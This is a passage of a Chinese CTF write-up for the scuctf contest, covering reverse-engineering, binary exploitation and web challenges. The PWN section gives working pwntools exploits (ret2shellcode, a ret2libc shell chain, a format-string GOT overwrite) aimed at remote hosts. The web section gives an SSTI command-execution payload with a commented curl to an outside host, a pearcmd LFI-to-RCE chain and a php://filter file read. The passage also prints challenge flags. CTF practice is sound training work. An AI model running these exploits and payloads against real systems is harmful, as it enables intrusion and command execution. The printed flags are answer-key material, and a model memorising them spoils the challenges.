# 14 = 95,
# 22 = 105,
# 9 = 99,
# 6 = 95,
# 11 = 117,
# 1 = 95,
# 19 = 101,
# 8 = 105,
# 0 = 73,
# 4 = 118]
# print(result)

Tower of Hanoi

Upx脱壳一下,ida反编译,

1668743439139

异或回去即可

DEBUG

Ida反编译后发现代码为对一个字符串30次随机两个位置交换,gdb看一下随机数

Gdb发现进去后会RE,patch掉即可

ez_logic

Ida反编译后发现由许多setjmp和longjmp组成,发现算法为相邻两个一组做区间加法,并且区间有序,差分后从前到后匹配即可

RE_签到

ida反编译一下

1668743450870

找到flag

ez_base

ida反编译后,仔细阅读发现就是一张的地图上有一些可以走的点,要求每个点只走一次且按“马”的方式走从,BFS即可

ez_vm

ida反编译后,已知一个操作列表,逐步完成操作

经分析:

Case 0:把栈顶两个数相加

Case 1:把栈顶两个数相减

Case 2:把栈顶两个数相异或

Case 3:把栈顶两个数相比较

Case 4,5,6:为比较后的跳转

Case 7:对栈顶的数在另一个数组中下标转值

Case 8:改写数组

Case 9:向栈里加一个数

Case 10:Wrong

Case 11:Right

Case 12:跳转

令另一个数组为Str[]

发现一些结构如

1
9 A 9 B 8 -> str[B]=A
1
2
3
4
5
6
7
8
9
10
9 A 9 100 8
9 100 7 9 lim 3
5 loop1
...
9 1 9 100 7 0 9 100 8
C loop2
是一个循环
for(i=A;i<lim;i++) {
...
}

发现流程由三个循环和一些赋值组成,且代码由Str[100]作为循环的i

分析一下三个循环中分别为

1
2
3
for(int i=0;i<25;i++) Str[i]=Str[i]^Str[i+1]
for(int i=0;i<24;i++) Str[i+1]+=Str[i]-i
{for(int i=1;i<25;i++) if(Str[i]!=Str[i+49]) return wrong; return right;}

爆破一下Str[0],倒着做即可

ez_unity

先找到核心代码文件 .\XuhanYilun_Data\Managed\Assembly-CSharp.dll

用ILSpy反编译,在项目中找到GameManager.cs

打开GameManager.cs ,在 Update函数中发现这样一段

1668743471088

把这一段去掉后重新编译成dll替换掉原来的Assembly-CSharp.dll

这样人物就不会死亡了

ez_xxx

一眼SMC

patch掉反调试部分后dump出内存,分析内存数据。

1668737764534

写出exp

1
2
3
4
target = [0x7E,0x1F,0x43,0x5E,0x1F,0x50,0x4B,0x45,0x5F,0x4B,0x4D,0x5A,0x4B,0x44,0x5B,0x5A,0x41,0x5F,0x50,0x4B,0x42,0x5E,0x45,0x41,0x5A,0x40,0x58,0x55,0x4B,0x4D,0x5A,0x40,0x4B,0x5F,0x45,0x5A,0x43,0x58,0x41,0x4B,0x59,0x4D,0x5A]

for i in target:
print(chr((i ^ 0x28) - 4), end = "")

ez_dp

使用pyinstxtractor工具分解出pyc

1668737938823

猜测函数主逻辑位于 t4.pyc,反编译。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
import wx, wx.xrc, random

class MyDialog1(wx.Dialog):
x = 123
y = 321
tot = 0
zq = 0
flag = 0

def __init__(self, parent):
wx.Dialog.__init__(self, parent, id=(wx.ID_ANY), title=(wx.EmptyString), pos=(wx.DefaultPosition), size=(wx.Size(400, 200)), style=(wx.DEFAULT_DIALOG_STYLE))
self.SetSizeHintsSz(wx.DefaultSize, wx.DefaultSize)
bSizer1 = wx.BoxSizer(wx.VERTICAL)
self.m_staticText1 = wx.StaticText(self, wx.ID_ANY, '123+321', wx.DefaultPosition, wx.DefaultSize, 0)
self.m_staticText1.Wrap(-1)
self.m_staticText1.SetFont(wx.Font(36, 70, 90, 90, False, '宋体'))
bSizer1.Add(self.m_staticText1, 0, wx.ALL, 5)
self.m_textCtrl1 = wx.TextCtrl(self, wx.ID_ANY, '在此输入您的答案', wx.DefaultPosition, wx.DefaultSize, wx.TE_PROCESS_ENTER)
bSizer1.Add(self.m_textCtrl1, 0, wx.ALL, 5)
self.m_button2 = wx.Button(self, wx.ID_ANY, '提交', wx.DefaultPosition, wx.DefaultSize, 0)
bSizer1.Add(self.m_button2, 0, wx.ALL, 5)
self.m_staticText2 = wx.StaticText(self, wx.ID_ANY, '做出9999999道加法题,而且准确率为100%就给你flag', wx.DefaultPosition, wx.DefaultSize, 0)
self.m_staticText2.Wrap(-1)
bSizer1.Add(self.m_staticText2, 0, wx.ALL, 5)
self.SetSizer(bSizer1)
self.Layout()
self.Centre(wx.BOTH)
self.m_textCtrl1.Bind(wx.EVT_TEXT_ENTER, self.tj)
self.m_button2.Bind(wx.EVT_BUTTON, self.tj)

def __del__(self):
pass

def gogogo(self, x):
if x >= 100:
self.flag += 1
return
self.gogogo(x + 1)
self.gogogo(x + 2)

def get_flag(self):
self.gogogo(0)
return self.flag

def tj(self, event):
self.tot += 1
ans = self.m_textCtrl1.Value
try:
if eval(ans) == self.x + self.y:
self.zq += 1
self.m_staticText2.Label = '答案正确 正确率:' + str(self.zq) + '/' + str(self.tot)
else:
self.m_staticText2.Label = '答案错误 正确率:' + str(self.zq) + '/' + str(self.tot)
except:
self.m_staticText2.Label = '未知错误 正确率:' + str(self.zq) + '/' + str(self.tot)
else:
if self.zq >= 9999999:
if self.zq == self.tot:
a = self.get_flag()
self.m_staticText2.Label = 'scuctf{' + str(a) + '}'
self.m_textCtrl1.Value = ''
self.x = random.choice(range(1000))
self.y = random.choice(range(1000))
self.m_staticText1.Label = str(self.x) + '+' + str(self.y)


app = wx.App(False)
zjm = MyDialog1(None)
zjm.Show(True)
app.MainLoop()

发现是斐波拉契数列。

ez_android

JADI分析.apk,函数主逻辑位于`com/example.check/MainActivity

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
package com.example.check;

import android.os.Bundle;
import android.view.View;
import android.widget.Button;
import android.widget.TextView;
import androidx.appcompat.app.AppCompatActivity;
import com.example.check.databinding.ActivityMainBinding;

/* loaded from: classes.dex */
public class MainActivity extends AppCompatActivity {
private ActivityMainBinding binding;
private int click_times = 0;
private String string = new String();
private TextView textView;

public native int check_s(String str);

public native String stringFromJNI();

static {
System.loadLibrary("check");
}

/* JADX INFO: Access modifiers changed from: protected */
@Override // androidx.fragment.app.FragmentActivity, androidx.activity.ComponentActivity, androidx.core.app.ComponentActivity, android.app.Activity
public void onCreate(Bundle bundle) {
super.onCreate(bundle);
ActivityMainBinding inflate = ActivityMainBinding.inflate(getLayoutInflater());
this.binding = inflate;
setContentView(inflate.getRoot());
this.textView = (TextView) findViewById(R.id.textView2);
((Button) findViewById(R.id.button)).setOnClickListener(new View.OnClickListener() { // from class: com.example.check.MainActivity.1
@Override // android.view.View.OnClickListener
public void onClick(View view) {
MainActivity.this.click1();
}
});
((Button) findViewById(R.id.button2)).setOnClickListener(new View.OnClickListener() { // from class: com.example.check.MainActivity.2
@Override // android.view.View.OnClickListener
public void onClick(View view) {
MainActivity.this.click2();
}
});
((Button) findViewById(R.id.button3)).setOnClickListener(new View.OnClickListener() { // from class: com.example.check.MainActivity.3
@Override // android.view.View.OnClickListener
public void onClick(View view) {
MainActivity.this.click3();
}
});
((Button) findViewById(R.id.button4)).setOnClickListener(new View.OnClickListener() { // from class: com.example.check.MainActivity.4
@Override // android.view.View.OnClickListener
public void onClick(View view) {
MainActivity.this.click4();
}
});
((Button) findViewById(R.id.button5)).setOnClickListener(new View.OnClickListener() { // from class: com.example.check.MainActivity.5
@Override // android.view.View.OnClickListener
public void onClick(View view) {
MainActivity.this.click5();
}
});
((Button) findViewById(R.id.button6)).setOnClickListener(new View.OnClickListener() { // from class: com.example.check.MainActivity.6
@Override // android.view.View.OnClickListener
public void onClick(View view) {
MainActivity.this.click6();
}
});
((Button) findViewById(R.id.button7)).setOnClickListener(new View.OnClickListener() { // from class: com.example.check.MainActivity.7
@Override // android.view.View.OnClickListener
public void onClick(View view) {
MainActivity.this.click7();
}
});
}

private void update() {
int i = this.click_times + 1;
this.click_times = i;
if (i >= 1000) {
this.textView.setText("scuctf{I_do_not_like_Android}");
} else {
this.textView.setText("你已经点击" + String.valueOf(this.click_times) + "次,加油!");
}
}

/* JADX INFO: Access modifiers changed from: private */
public void click1() {
update();
}

/* JADX INFO: Access modifiers changed from: private */
public void click2() {
update();
}

/* JADX INFO: Access modifiers changed from: private */
public void click3() {
update();
this.string += '0';
}

/* JADX INFO: Access modifiers changed from: private */
public void click4() {
update();
}

/* JADX INFO: Access modifiers changed from: private */
public void click5() {
update();
this.string += '1';
}

/* JADX INFO: Access modifiers changed from: private */
public void click6() {
update();
}

/* JADX INFO: Access modifiers changed from: private */
public void click7() {
update();
if (check_s(this.string) == 0) {
this.textView.setText("nice");
String str = new String();
String str2 = new String();
for (int hashCode = this.string.hashCode(); hashCode != 0; hashCode /= 10) {
str = str + String.valueOf(hashCode % 10);
}
for (int i = 0; i < str.length(); i++) {
str2 = str2 + String.valueOf((int) str.charAt(i));
}
this.textView.setText("scuctf{" + str2 + "}");
}
}
}

基本逻辑:通过 click3click5生成一串01串。调用native层函数check_s检验

1668743496720

找到判断函数后为依次解析二进制,返回表中对应,把flag中的字符反射成二进制后拼起来即可

exp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
public class android {
public static void main(String[] args) {
String string = "111110010001111100001001111111101111010111111110110111111101000001001001011100111111101111110111111100011111000111111100001111100100011111000010011111110000111110011100010000010100110000000111111101000110101111111111101111100111100100000010111001111100111111111111001000111110000100111111110111101011111111011011111111101010000001111110111111000101011111110101011111101111100011111111010010000001010011001100011111001111111101101111111000001011011010010100101111111010010100010001111100011111111111110010100110000010100010111001100";
String str = new String();
String str2 = new String();
for (int hashCode = string.hashCode(); hashCode != 0; hashCode /= 10) {
str = str + String.valueOf(hashCode % 10);
}
System.out.println(string.hashCode());
for (int i = 0; i < str.length(); i++) {
str2 = str2 + String.valueOf((int) str.charAt(i));
}

System.out.println("scuctf{" + str2 + "}");
}
}

PWN

2048_game

测试2048水平?(雾

test_your_nc

nc & cat flag即可。

ret2text

1
2
3
4
5
6
7
from pwn import *
elf = ELF("ret2text")
payload = b"A" * (32 + 4 + 4)
payload += p32(0x08049256)
sh = remote("114.117.187.56", 10002)
sh.sendline(payload)
sh.interactive()

ret2shellcode

1
2
3
4
5
6
7
8
from pwn import *
context(arch = "amd64", os = "linux")
sh = remote("114.117.187.56", 10003)
sh.recv()
sh.sendline(asm(shellcraft.sh()))
sh.recv()
sh.sendline(b"A" * (32 + 8) + p64(0x4040A0))
sh.interactive()

ret2libc

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
from pwn import *
from LibcSearcher import *
context(log_level = "debug")
context.terminal = ["konsole", "-e"]
elf = ELF("ret2libc")
elf_puts_got = elf.got["puts"]
elf_puts_plt = elf.plt["puts"]
__libc_start_main_got = elf.got["__libc_start_main"]
__libc_start_main_symb = elf.symbols["__libc_start_main"]
main_symb = 0x4010F0
pop_rdi_ret = 0x401333
pop_rsi_pop_r15_ret = 0x401331
ret = 0x40101a

# sh = process("./ret2libc")
sh = remote("114.117.187.56", "10007")
# gdb.attach(sh)
payload1 = b"A" * (32 + 8) + p64(pop_rdi_ret)
payload1 += p64(elf_puts_got)
payload1 += p64(elf_puts_plt)
payload1 += p64(main_symb)
sh.recv()
sh.sendline(payload1)
# print(leaked_puts_str)
leaked_puts_str = sh.recvuntil(b"\nDo")# .rjust(b"\x00")
sh.recv()
# print(leaked_puts_str)
puts_real = (u64(leaked_puts_str[1:-3].ljust(8, b"\x00")))
print(hex(puts_real))
searcher = LibcSearcher("puts", puts_real)
# searcher.select_libc(6)
# print(searcher)
libc_base = puts_real - searcher.dump("puts")
payload2 = b"A" * (32 + 8) + p64(pop_rdi_ret)
str_bin_sh = searcher.dump("str_bin_sh") + libc_base
payload2 += p64(str_bin_sh)
# print(str_bin_sh)
system_sh = searcher.dump("system") + libc_base
# system_sh = puts_real
# print(hex(system_sh))
payload2 += p64(ret)
payload2 += p64(system_sh)
# print(payload2)
# payload2 += p64(main_symb)
sh.sendline(payload2)
# sh.recv()
sh.interactive()

fmt

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
from pwn import *
from LibcSearcher import *
context(log_level = "debug", terminal = ["konsole", "-e"], arch = "amd64")
# sh = process("./fmt")
# gdb.attach(sh)

sh = remote("114.117.187.56", "10004")
elf = ELF("./fmt")
libc = ELF("./libc.so.6")
# sh.recv()
payload_leak = b"%7$08sBB"
payload_leak += p64(elf.got["__libc_start_main"])
sh.recv()
sh.sendline(payload_leak)
leaked_libc_start_main = sh.recvuntil(b"BB")
leaked_libc_start_main = u64(leaked_libc_start_main[2:-2].ljust(8, b"\x00"))
libc_s = LibcSearcher("__libc_start_main", leaked_libc_start_main)

printf_got = elf.got["printf"]

payload_leak2 = b"%7$08sBB"
payload_leak2 += p64(elf.got["puts"])
sh.recv()
sh.sendline(payload_leak2)
sh.recv()
leaked_puts = sh.recvuntil(b"BB")
leaked_puts = u64(leaked_puts[2:-2].ljust(8, b"\x00"))
print(leaked_puts)
libc_s.add_condition("puts", leaked_puts)
libc_s.select_libc(0)
# print(libc_s.dump("str_bin_sh"))
libc_base = leaked_libc_start_main - libc_s.dump("__libc_start_main")
system_addr = libc_s.dump("system") + libc_base
printf_addr = libc_s.dump("printf") + libc_base
# strncmp_addr = elf.got["strncmp"]

print(hex(printf_got))
print(hex(system_addr))
# print(hex(printf_addr))
# print(hex(system_addr % (16 ** 8)))
payload = fmtstr_payload(6, {printf_got : system_addr})
# payload = "%"
# payload = fmtstr_payload(7, {printf_got:system_addr})
print(len(payload))
sh.sendline(payload)
sh.recv()
sh.sendline(b"/bin/sh")
sh.interactive()

'''
in 1st case
0x7f47e26a0c90
0x7f47e2691290

other

0x7f97d4037c90
0x7f97d4028290

0x7f70c6c4dc90
0x7f70c6c3e290
'''
sh.recv()

'''
0x70 0x17 0xfd 0x1d 0x7e 0x7f 0x00 0x00
0x00007f7e1dfd1770
70 1

0x404038 <printf@got.plt>: 0x70 0x97 0xb2 0x9b 0xa0 0x7f 0x00 0x00
0x404040 <alarm@got.plt>: 0xa0 0xc1 0xba 0x9b 0xa0 0x7f 0x00 0x00
0x404048 <read@got.plt>: 0x00 0x10 0xbd 0x9b 0xa0 0x7f 0x00 0x00
0x404050 <signal@got.plt>: 0x80 0x28 0xb1 0x9b 0xa0 0x7f 0x00 0x00
0x7fa09bb233d0
0x7fa09bb29770
0x00007fa09bb29770
<printf@got.plt>: 0x70 0x97 0xb2 0x9b 0xa0 0x7f 0x00 0x00

<printf@got.plt>: 0x00007ff660ecd770 0x00007ff660f501a0
'''

Web

CheckIn

数组绕过hash函数

1
2
3
4
import requests
url = "http://114.117.187.56:11000/"
r = requests.post(url, params = {"a[]" : 1}, data = {"b[]" : 2})
print(r.text)

Include

伪协议读取 flag.php

1
2
3
4
5
6
7
import requests
from base64 import *
url = "http://114.117.187.56:11002/"
# http://114.117.187.56:11002/?file=php://filter/read=convert.base64-encode/resource=flag.php
r = requests.post(url, params = {"file" : r"php://filter/read=convert.base64-encode/resource=flag.php"})
# print(r.text)
print(b64decode(b"PD9waHANCiRmbGFnID0gJ3NjdWN0Zns2YWZmNWE3N2JhNjg1ODY1MTVhYTViMGE5YTFiZTVhMn0nOw=="))

easy_flask

首先爆破出Popen在哪个subclasses中

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
import requests

# payload1 = '''{%print(().__getattribute__("__ssalc__"[::-1]).__getattribute__("__esab__"[::-1]).__getattribute__("__sessalcbus__"[::-1])['''
# payload2 = '''].__getattribute__("__tini__"[::-1]).__getattribute__("__slabolg__")['__buil'+'tins__']["ev" + "al"]("'''
# payload3 = '''"))%}'''
# {% if ((()|attr("__ssalc__"[::-1])|attr("__esab__"[::-1])|attr("__sessalcbus__"[::-1])())[139]|attr("__tini__"[::-1])|attr("__slabolg__"[::-1]))["popen"]("curl tiger1218.com") == "chiv"%} a {% endif %}

payload1 = '''{% if ((()|attr("__ssalc__"[::-1])|attr("__esab__"[::-1])|attr("__sessalcbus__"[::-1])())['''
payload2 = ''']|attr("__tini__"[::-1])|attr("__slabolg__"[::-1]))["popen"]("sleep 50") == "chiv"%} a {% endif %}'''

# print(payload1 + payload2 + payload3)

# p
tmp = 0

for i in range(200):
prams = {"name" : payload1 + str(i) + payload2}
# print(prams["name"])
req = requests.get("http://114.117.187.56:11003/view", params = prams)
if(req.text != tmp):
tmp = req.text
print(i, req.text)

爆破出是第139个。

不能出网,盲注。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
import requests
from string import printable

payload = '''{% if ((()|attr("__ssalc__"[::-1])|attr("__esab__"[::-1])|attr("__sessalcbus__"[::-1])())[137]|attr("__tini__"[::-1])|attr("__slabolg__"[::-1]))["popen"]('galf/ tac'[::-1]).read()['''
# index = str(1)
payload2 = ''']=="'''
# char = chr(i)
payload3 = '''"%} a {% endif %}'''

for index in range(100):
flag = 1
for char in printable:
param = {"name" : payload + str(index) + payload2 + char + payload3}
# print(param["name"])
req = requests.get("http://114.117.187.56:11003/view", params = param)
if req.text == "Ok":
print(char, end = "")
break
elif req.text != "NO":
flag = 0

# if not flag:
# break

JSJSJS

1
2
3
4
5
import requests
from base64 import *
url = "http://114.117.187.56:11005/api/flag"
r = requests.post(url)
print(r.text)

baby_ip

1
2
3
4
5
import requests
from base64 import *
url = "http://114.117.187.56:11004/"
r = requests.post(url, data={"password" : b64decode(b"aGdneXlkcw==")}, headers={"X-Forwarded-For": "127.0.0.1"})
print(r.text)

可爱的探针

1
2
3
4
5
import requests
from base64 import *
url = "http://117.50.188.49:1145/tz.php"
r = requests.post(url, params={"act": "phpinfo"})
print(r.text)

python tmp_web.py | grep SCUCTF

真ikun进

view http://114.117.187.56:11006/js/game.js?s=4

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
let flag = "c23Rme22QwOTJlLTYyNDQtMTFlZC1hYTFhLWM4NThjMDllYjE0MH0=";
const regex = /lgg/g;

String.prototype.insetAt = function(str,offset){
var regx = new RegExp("(.{"+offset+"})");
return this.replace(regx,"$1"+str);
};

if(regex.test("lgg")){
flag = flag.insetAt('N1Y',2);
}
if(regex.test("lgg")){
flag = flag.insetAt("QC2",6);
}
if(regex.test("yuelgg")){
flag = flag.insetAt('JiY',10);
}
if(regex.test("yuelgg")){
flag = flag.insetAt('C3Y',14);
}

let trueflag = flag;

run this code

1
echo c2N1Y3Rme2JiY2QwOTJlLTYyNDQtMTFlZC1hYTFhLWM4NThjMDllYjE0MH0= | base64 -d

简单的CMS

被编码问题坑惨了。。。。

http://114.117.187.56:12000/?+config-create+/&r=../../../../../../../../../../../usr/share/php/pearcmd&/<?=print(1);?>+/tmp/ktou.php

1
2
3
4
5
import requests
from base64 import *
url = "http://114.117.187.56:12000/"
r = requests.post(url, params={"r": '''../../../../../../../../tmp/ktou'''}, data = {"1":'''system("cat /flag*");'''})
print(r.text)

unserialize

1
2
3
4
5
import requests
from base64 import *
url = "http://114.117.187.56:11008/"
r = requests.post(url, params={"p": '''O:1:"A":2:{s:3:"kfc";s:7:"v_me_50";}'''})
print(r.text)

ezbypass

环境崩了。说下思路

http://43.142.108.183:8085/?url=php://filter/read=convert.iconv.UTF-16BE.UTF-32BE/resource=/flag
对这串base64解码,去除所有 \x00的byte,就可以得到flag了。